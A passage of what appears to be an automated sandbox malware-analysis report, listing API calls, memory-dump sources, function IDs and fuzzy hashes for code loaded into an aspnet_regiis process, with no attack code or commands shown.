                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ConditionInitializeVariablemoz_xmalloc$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedExclusiveLockProfileRelease_beginthreadexfloormallocmozalloc_aborttolower
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 861561044-0
                                                                                                                            APIs
                                                                                                                            • memcpy.VCRUNTIME140(?,?,?), ref: 6CC317B2
                                                                                                                            • memset.VCRUNTIME140(?,00000000,?,?), ref: 6CC318EE
                                                                                                                            • free.MOZGLUE(?), ref: 6CC31911
                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC3194C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturnfreememcpymemset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3725304770-0
                                                                                                                            APIs
                                                                                                                            • GetTickCount64.KERNEL32 ref: 6CC45D40
                                                                                                                            • EnterCriticalSection.KERNEL32(6CCAF688), ref: 6CC45D67
                                                                                                                            • __aulldiv.LIBCMT ref: 6CC45DB4
                                                                                                                            • LeaveCriticalSection.KERNEL32(6CCAF688), ref: 6CC45DED
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalSection$Count64EnterLeaveTick__aulldiv
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 557828605-0
                                                                                                                            APIs
                                                                                                                            • memcpy.VCRUNTIME140(?,-000000EA,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC2CEBD
                                                                                                                            • memcpy.VCRUNTIME140(?,?,?,?,?,?,?), ref: 6CC2CEF5
                                                                                                                            • memset.VCRUNTIME140(-000000E5,00000030,?,?,?,?,?,?,?,?), ref: 6CC2CF4E
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: memcpy$memset
                                                                                                                            • String ID: 0
                                                                                                                            • API String ID: 438689982-4108050209
                                                                                                                            APIs
                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC877FA
                                                                                                                            • ?StringToDouble@StringToDoubleConverter@double_conversion@@QBENPBDHPAH@Z.MOZGLUE(00000001,00000000,?), ref: 6CC87829
                                                                                                                              • Part of subcall function 6CC5CC38: GetCurrentProcess.KERNEL32(?,?,?,?,6CC231A7), ref: 6CC5CC45
                                                                                                                              • Part of subcall function 6CC5CC38: TerminateProcess.KERNEL32(00000000,00000003,?,?,?,?,6CC231A7), ref: 6CC5CC4E
                                                                                                                            • ?EcmaScriptConverter@DoubleToStringConverter@double_conversion@@SAABV12@XZ.MOZGLUE ref: 6CC8789F
                                                                                                                            • ?ToShortestIeeeNumber@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@W4DtoaMode@12@@Z.MOZGLUE ref: 6CC878CF
                                                                                                                              • Part of subcall function 6CC24DE0: ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6CC24E5A
                                                                                                                              • Part of subcall function 6CC24DE0: ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6CC24E97
                                                                                                                              • Part of subcall function 6CC24290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6CC63EBD,6CC63EBD,00000000), ref: 6CC242A9
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: String$Double$Converter@double_conversion@@$DtoaProcessstrlen$Ascii@Builder@2@Builder@2@@Converter@CreateCurrentDecimalDouble@EcmaIeeeMode@12@Mode@12@@Number@Representation@ScriptShortestTerminateV12@
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2525797420-0
                                                                                                                            APIs
                                                                                                                            • moz_xmalloc.MOZGLUE(00000200,?,?,?,?,?,?,?,?,?,?,?,?,6CC682BC,?,?), ref: 6CC6649B
                                                                                                                              • Part of subcall function 6CC3CA10: malloc.MOZGLUE(?), ref: 6CC3CA26
                                                                                                                            • memset.VCRUNTIME140(00000000,00000000,00000200,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC664A9
                                                                                                                              • Part of subcall function 6CC5FA80: GetCurrentThreadId.KERNEL32 ref: 6CC5FA8D
                                                                                                                              • Part of subcall function 6CC5FA80: AcquireSRWLockExclusive.KERNEL32(6CCAF448), ref: 6CC5FA99
                                                                                                                            • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC6653F
                                                                                                                            • free.MOZGLUE(?), ref: 6CC6655A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfreemallocmemsetmoz_xmalloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3596744550-0
                                                                                                                            APIs
                                                                                                                            • memcpy.VCRUNTIME140(00000000,?,80000001,80000000,?,6CC7D019,?,?,?,?,?,00000000,?,6CC6DA31,00100000,?), ref: 6CC5FFD3
                                                                                                                            • memcpy.VCRUNTIME140(00000000,?,?,?,6CC7D019,?,?,?,?,?,00000000,?,6CC6DA31,00100000,?,?), ref: 6CC5FFF5
                                                                                                                            • free.MOZGLUE(?,?,?,?,?,6CC7D019,?,?,?,?,?,00000000,?,6CC6DA31,00100000,?), ref: 6CC6001B
                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,6CC7D019,?,?,?,?,?,00000000,?,6CC6DA31,00100000,?,?), ref: 6CC6002A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: memcpy$_invalid_parameter_noinfo_noreturnfree
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 826125452-0
                                                                                                                            APIs
                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC3B4F5
                                                                                                                            • AcquireSRWLockExclusive.KERNEL32(6CCAF4B8), ref: 6CC3B502
                                                                                                                            • ReleaseSRWLockExclusive.KERNEL32(6CCAF4B8), ref: 6CC3B542
                                                                                                                            • free.MOZGLUE(?), ref: 6CC3B578
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                            • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                            • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2047719359-0
                                                                                                                            • Opcode ID: 55756737ed68c1c662120a6210027df3bde1a4cdfbf2ae933609b584751db9a0
                                                                                                                            • Instruction ID: a45cddc877f7d9ae4eb6184e6e2b29bd568ab98ded6ed5f9d3533f6b2901e51e
                                                                                                                            • Opcode Fuzzy Hash: 55756737ed68c1c662120a6210027df3bde1a4cdfbf2ae933609b584751db9a0
                                                                                                                            • Instruction Fuzzy Hash: 0911AF31A04F59CBD7118F69E418765B3B1FF96318F14A70AE84D53E01FBB5A1C587A0
                                                                                                                            APIs
                                                                                                                            • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,6CC2F20E,?), ref: 6CC63DF5
                                                                                                                            • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(6CC2F20E,00000000,?), ref: 6CC63DFC
                                                                                                                            • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6CC63E06
                                                                                                                            • fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,00000000), ref: 6CC63E0E
                                                                                                                              • Part of subcall function 6CC5CC00: GetCurrentProcess.KERNEL32(?,?,6CC231A7), ref: 6CC5CC0D
                                                                                                                              • Part of subcall function 6CC5CC00: TerminateProcess.KERNEL32(00000000,00000003,?,?,6CC231A7), ref: 6CC5CC16
                                                                                                                            Similarity
                                                                                                                            • API ID: Process__acrt_iob_func$CurrentTerminatefputcfputs
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2787204188-0
                                                                                                                            • Opcode ID: 820e0ea8b952aff5a1f05e8756a4485976d68f7ea9a835b60e8f0b5e539942e4
                                                                                                                            • Instruction ID: 66d9e6b6ccd5887381e0c3c3610c6c8298287b6b9249e63e2ad2f468b4cc3021
                                                                                                                            • Opcode Fuzzy Hash: 820e0ea8b952aff5a1f05e8756a4485976d68f7ea9a835b60e8f0b5e539942e4
                                                                                                                            • Instruction Fuzzy Hash: E6F0FE719002086BD704AB95EC85DAF377DDB46628F084020FD0857741E636B92586F7
                                                                                                                            APIs
                                                                                                                            • moz_xmalloc.MOZGLUE(00000028,?,?,?), ref: 6CC785D3
                                                                                                                              • Part of subcall function 6CC3CA10: malloc.MOZGLUE(?), ref: 6CC3CA26
                                                                                                                            • ?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long,?,?,?), ref: 6CC78725
                                                                                                                            Strings
                                                                                                                            Similarity
                                                                                                                            • API ID: Xlength_error@std@@mallocmoz_xmalloc
                                                                                                                            • String ID: map/set<T> too long
                                                                                                                            • API String ID: 3720097785-1285458680
                                                                                                                            • Opcode ID: 2a78e354993f5054aa401dbd1151eee953067f62483745f9b92bd266906d6253
                                                                                                                            • Instruction ID: c01c647eeb63700e74a89d529c70d4c55c9da23a694d793b91d7452f9757932b
                                                                                                                            • Opcode Fuzzy Hash: 2a78e354993f5054aa401dbd1151eee953067f62483745f9b92bd266906d6253
                                                                                                                            • Instruction Fuzzy Hash: 4B516674600641DFD711CF18C084A59BBF1FF4A328F18C18ADA596BB52D335E885CFA2
                                                                                                                            APIs
                                                                                                                            • ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(00000000,?,?,?,?), ref: 6CC2BDEB
                                                                                                                            • ?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6CC2BE8F
                                                                                                                            Strings
                                                                                                                            Similarity
                                                                                                                            • API ID: String$Builder@2@@Converter@double_conversion@@Double$CreateDecimalHandleRepresentation@SpecialValues@
                                                                                                                            • String ID: 0
                                                                                                                            • API String ID: 2811501404-4108050209
                                                                                                                            • Opcode ID: 002f55dd0941b96d120bb2cd229175a4040321994f2245681434f0d90823807d
                                                                                                                            • Instruction ID: 1a56932559575324ca55aa564de8cb6e519db039ae7cc73dbb1befaa3dca3633
                                                                                                                            • Opcode Fuzzy Hash: 002f55dd0941b96d120bb2cd229175a4040321994f2245681434f0d90823807d
                                                                                                                            • Instruction Fuzzy Hash: 0041B171909745CFC701CF39C491A9BBBF4BF8A348F008A5DF986A7611E734E9598B82
                                                                                                                            APIs
                                                                                                                            • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC63D19
                                                                                                                            • mozalloc_abort.MOZGLUE(?), ref: 6CC63D6C
                                                                                                                            Strings
                                                                                                                            Similarity
                                                                                                                            • API ID: _errnomozalloc_abort
                                                                                                                            • String ID: d
                                                                                                                            • API String ID: 3471241338-2564639436
                                                                                                                            • Opcode ID: 5197adb7c794e6904c59bc6f795c0f337e310fe499528db85ecd8add8c20fa71
                                                                                                                            • Instruction ID: 761d84d3caeeea325414af31841ba8cc398ca85494312d788b97873be7158049
                                                                                                                            • Opcode Fuzzy Hash: 5197adb7c794e6904c59bc6f795c0f337e310fe499528db85ecd8add8c20fa71
                                                                                                                            • Instruction Fuzzy Hash: A211E735E14688D7DB008FAECD584EDB775EF97318B499259DC45ABA02FB30A9C4C390
                                                                                                                            APIs
                                                                                                                            • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_DISABLE_WALKTHESTACK), ref: 6CC86E22
                                                                                                                            • __Init_thread_footer.LIBCMT ref: 6CC86E3F
                                                                                                                            Strings
                                                                                                                            • MOZ_DISABLE_WALKTHESTACK, xrefs: 6CC86E1D
                                                                                                                            Similarity
                                                                                                                            • API ID: Init_thread_footergetenv
                                                                                                                            • String ID: MOZ_DISABLE_WALKTHESTACK
                                                                                                                            • API String ID: 1472356752-1153589363
                                                                                                                            • Opcode ID: e177fb1eecaa9b42ac56caa150678dd4aeacad5cce00f045df35e2d4f093d7b8
                                                                                                                            • Instruction ID: 8cd115eb96b01c4080520f46cf945b2a922db1249aa6de6d04b2fab61d271986
                                                                                                                            • Opcode Fuzzy Hash: e177fb1eecaa9b42ac56caa150678dd4aeacad5cce00f045df35e2d4f093d7b8
                                                                                                                            • Instruction Fuzzy Hash: 21F0FA306066418EDA208AE8E858A9A3B72A35231CF040265C85087BB1F671E527CBA3
                                                                                                                            APIs
                                                                                                                            • __Init_thread_footer.LIBCMT ref: 6CC39EEF
                                                                                                                            Strings
                                                                                                                            Similarity
                                                                                                                            • API ID: Init_thread_footer
                                                                                                                            • String ID: Infinity$NaN
                                                                                                                            • API String ID: 1385522511-4285296124
                                                                                                                            • Opcode ID: 58b6acdd02f33794e3ea3a495eebb2c7f8231127fb0d5c9f4d65b092dd19d72f
                                                                                                                            • Instruction ID: 288bf644ef2a1c2f714679b1ce1e0315099f85b131182214f7260d56b7874cb2
                                                                                                                            • Opcode Fuzzy Hash: 58b6acdd02f33794e3ea3a495eebb2c7f8231127fb0d5c9f4d65b092dd19d72f
                                                                                                                            • Instruction Fuzzy Hash: 5CF0AF70E00642CEDB128FD8F84D7583771B343309F200A99C5044BB80F7B56566CBDA
                                                                                                                            APIs
                                                                                                                            • DisableThreadLibraryCalls.KERNEL32(?), ref: 6CC3BEE3
                                                                                                                            • LoadLibraryExW.KERNEL32(cryptbase.dll,00000000,00000800), ref: 6CC3BEF5
                                                                                                                            Strings
                                                                                                                            Similarity
                                                                                                                            • API ID: Library$CallsDisableLoadThread
                                                                                                                            • String ID: cryptbase.dll
                                                                                                                            • API String ID: 4137859361-1262567842
                                                                                                                            • Opcode ID: 4ff60d3c649094d417f7ecd78889216dc676ba46fd17c864a4a9188957a2ac95
                                                                                                                            • Instruction ID: c9f5ddb16f758e9180140072239c5a9686cb935de259f9f0161a115c627abbae
                                                                                                                            • Opcode Fuzzy Hash: 4ff60d3c649094d417f7ecd78889216dc676ba46fd17c864a4a9188957a2ac95
                                                                                                                            • Instruction Fuzzy Hash: 47D023311C050CEBCB00ABD4AC1DF1D3BB4A701315F10C020F309448D1D7B09410CF40
                                                                                                                            APIs
                                                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,6CC7B2C9,?,?,?,6CC7B127,?,?,?,?,?,?,?,?,?,6CC7AE52), ref: 6CC7B628
                                                                                                                              • Part of subcall function 6CC790E0: free.MOZGLUE(?,00000000,?,?,6CC7DEDB), ref: 6CC790FF
                                                                                                                              • Part of subcall function 6CC790E0: free.MOZGLUE(?,00000000,?,?,6CC7DEDB), ref: 6CC79108
                                                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6CC7B2C9,?,?,?,6CC7B127,?,?,?,?,?,?,?,?,?,6CC7AE52), ref: 6CC7B67D
                                                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6CC7B2C9,?,?,?,6CC7B127,?,?,?,?,?,?,?,?,?,6CC7AE52), ref: 6CC7B708
                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,6CC7B127,?,?,?,?,?,?,?,?), ref: 6CC7B74D
                                                                                                                            Similarity
                                                                                                                            • API ID: freemalloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3061335427-0
                                                                                                                            • Opcode ID: 189bf74d22a58b278517e3152a36dedd196e3716c08d42510cc73d63494d5984
                                                                                                                            • Instruction ID: acea6b9bfef3567657899d8649a53e549c108e513fa42fbcd6717c9e041d69ca
                                                                                                                            • Opcode Fuzzy Hash: 189bf74d22a58b278517e3152a36dedd196e3716c08d42510cc73d63494d5984
                                                                                                                            • Instruction Fuzzy Hash: 5151DDB1A012168FDB28CF59C9A466EB7B5FF85304F05852DC95AAB700EB35E804CBB1
                                                                                                                            APIs
                                                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,6CC6FF2A), ref: 6CC7DFFD
                                                                                                                              • Part of subcall function 6CC790E0: free.MOZGLUE(?,00000000,?,?,6CC7DEDB), ref: 6CC790FF
                                                                                                                              • Part of subcall function 6CC790E0: free.MOZGLUE(?,00000000,?,?,6CC7DEDB), ref: 6CC79108
                                                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6CC6FF2A), ref: 6CC7E04A
                                                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6CC6FF2A), ref: 6CC7E0C0
                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,6CC6FF2A), ref: 6CC7E0FE
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                             • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                             • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                             • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                             • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: freemalloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3061335427-0
                                                                                                                            • Opcode ID: 1cbee891c52d9521a0601a02e2b4d1c56952145cde61a4fc1b4c06168c2b7965
                                                                                                                            • Instruction ID: 9f1295f126d8b1ef2fc0168fba0895b94b38f126ffede7f5bd229ce576af16f0
                                                                                                                            • Opcode Fuzzy Hash: 1cbee891c52d9521a0601a02e2b4d1c56952145cde61a4fc1b4c06168c2b7965
                                                                                                                            • Instruction Fuzzy Hash: AA41C1B26042168FEB24CF68D88479A77B6FB45308F15493DD516DB740F732E906CBA2
                                                                                                                            APIs
                                                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000018), ref: 6CC76EAB
                                                                                                                            • memcpy.VCRUNTIME140(00000000,00000018,-000000A0), ref: 6CC76EFA
                                                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6CC76F1E
                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CC76F5C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                             • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                             • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                             • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                             • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: malloc$freememcpy
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4259248891-0
                                                                                                                            • Opcode ID: 2071e7a558352ed4e520d07a4233f110b68b2497ebf4958a90a874c3c15736aa
                                                                                                                            • Instruction ID: 183720d87ffc2dbb74159c3f86d213a63ba90c266233887a851755ea9579f9d3
                                                                                                                            • Opcode Fuzzy Hash: 2071e7a558352ed4e520d07a4233f110b68b2497ebf4958a90a874c3c15736aa
                                                                                                                            • Instruction Fuzzy Hash: DC31D071A10A0A8FDB14CF2DDD806AA73E9FB85344F50823AD41AD7651FB31E65987A0
                                                                                                                            APIs
                                                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,6CC30A4D,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC8B5EA
                                                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000020,?,6CC30A4D,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC8B623
                                                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,?,6CC30A4D,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC8B66C
                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,6CC30A4D,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC8B67F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                             • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                             • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                             • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                             • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: malloc$free
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1480856625-0
                                                                                                                            • Opcode ID: 6fadccd2c67165af8b65dd57c8cb09cfe5ef6363ebda482183cf135d73b5a71d
                                                                                                                            • Instruction ID: 94eecc6342697774b7a527be0f629d2a94e84eef174d6ab38dac35e2de2cccea
                                                                                                                            • Opcode Fuzzy Hash: 6fadccd2c67165af8b65dd57c8cb09cfe5ef6363ebda482183cf135d73b5a71d
                                                                                                                            • Instruction Fuzzy Hash: F831D4B1A022168FDB14CF59CC5465FBBF5FF81318F16866AC8069B205EB31E915CBA1
                                                                                                                            APIs
                                                                                                                            • memcpy.VCRUNTIME140(?,?,00010000), ref: 6CC5F611
                                                                                                                            • memcpy.VCRUNTIME140(?,?,?), ref: 6CC5F623
                                                                                                                            • memcpy.VCRUNTIME140(?,?,00010000), ref: 6CC5F652
                                                                                                                            • memcpy.VCRUNTIME140(?,?,?), ref: 6CC5F668
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.2607666855.000000006CC21000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CC20000, based on PE: true
                                                                                                                             • Associated: 00000003.00000002.2607611308.000000006CC20000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                             • Associated: 00000003.00000002.2607770676.000000006CC9D000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                             • Associated: 00000003.00000002.2607808731.000000006CCAE000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                             • Associated: 00000003.00000002.2607851671.000000006CCB2000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_6cc20000_aspnet_regiis.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: memcpy
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3510742995-0
                                                                                                                            • Opcode ID: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
                                                                                                                            • Instruction ID: 306d3753d34c8ae10e48c860b3e1203b7e53435f46a433c5ea2cba9e1294e92e
                                                                                                                            • Opcode Fuzzy Hash: cd72a4b24c16f126375525e6a79600fc7eb806012afa7aeaa1976f5403f08771
